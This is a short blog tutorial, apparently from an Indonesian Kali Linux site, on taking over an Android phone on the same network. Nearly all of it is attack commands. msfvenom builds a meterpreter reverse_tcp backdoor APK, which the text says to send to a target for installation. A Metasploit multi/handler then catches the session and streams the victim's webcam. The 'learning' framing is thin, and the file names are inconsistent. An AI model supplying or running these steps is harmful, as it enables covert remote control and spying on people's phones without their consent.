How to Hack Android in one network - Tutorial Kali Linux -->

How to Hack Android in one network

Hack Android in One Network!

Dedicated to learning!
>Watch and Learn<<
First open the terminal & create the backdor.
  • root@kali:~ # msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.64 lport=444 R > test.apk
For the lhost section=192.168.43.64
match your Inet ‘with the command:
  • root@kali:~ # ifconfig
then fake.apk successfully made: // it's up to you to send it through what is important fake.apk can be installed by the target android!
After fake.apk is installed, run the terminal:
  • root@kali:~ # service postgresql start
setelah itu ketikan lagi :
  • root@kali:~ # msfconsole
then enter the Metasploit session and type it again with the command:
  • msf > use multi/handler
then type again:
  • msf exploit(handler) > set payload android/meterpreter/reverse_tcp
Enter lhost :
  • msf exploit(handler) > set lhost 192.168.43.64
Enter lport :
  • msf exploit(handler) > set lport 444
and..
  • msf exploit(handler) > exploit
typing :
  • msf exploit(handler) > jobs
Look at what is connected to the backdoor and type:
  • msf exploit(handler) > sessions
because the one connected to the backdoor is session 3, and to enter the meterpreter session, just type:
  • msf exploit(handler) > sessions 3
Screenshot from 2017-09-12 19-48-39
now..
  • meterpreter > help
For example I tap the target camera, type:
  • meterpreter > webcam_stream
and..

Screenshot from 2017-09-12 19-50-37

"Done here
Buka Komentar
Tutup Komentar

0 Response to "How to Hack Android in one network"

Iklan Atas Artikel

Iklan Tengah Artikel 2